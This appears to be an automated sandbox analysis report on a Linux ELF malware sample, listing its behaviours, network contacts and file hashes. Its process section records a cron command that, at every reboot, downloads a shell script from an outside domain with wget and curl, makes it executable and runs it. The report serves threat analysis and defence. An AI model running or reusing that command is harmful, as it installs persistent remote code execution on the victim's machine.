Analysis Overview
SHA256
721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443
Threat Level: Shows suspicious behavior
The file 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:31
Reported
2024-10-27 02:33
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
149s
Max time network
139s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Destination IP | 152.53.15.127 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /var/spool/cron/crontabs/tmp.1cgCnI | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Changes the process name, possibly in an attempt to hide itself | /bin/busybox ntpd | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A |
Reads runtime system information
Processes
/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
[/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| N/A | 224.0.0.251:5353 | N/A | udp |
| DE | 152.53.15.127:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:13831 | kingstonwikkerink.dyn | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
Files
/var/spool/cron/crontabs/tmp.1cgCnI
| MD5 | 050970160d674c8e3e883f557c869f9c |
| SHA1 | 9f62fac10caa5e0f6f9642947ef6e7b8e3418dbc |
| SHA256 | f93a301e05ee4495bf0a2c767c9a61a4f084c19bc08f618c5a0118533391f203 |
| SHA512 | 584e048471b1d5f554923779f088f10a26d72e6d04200b5cd4049191837de7484b46c578448223888ea5bf054412966bc216818d6fbc03800f39432683f67a10 |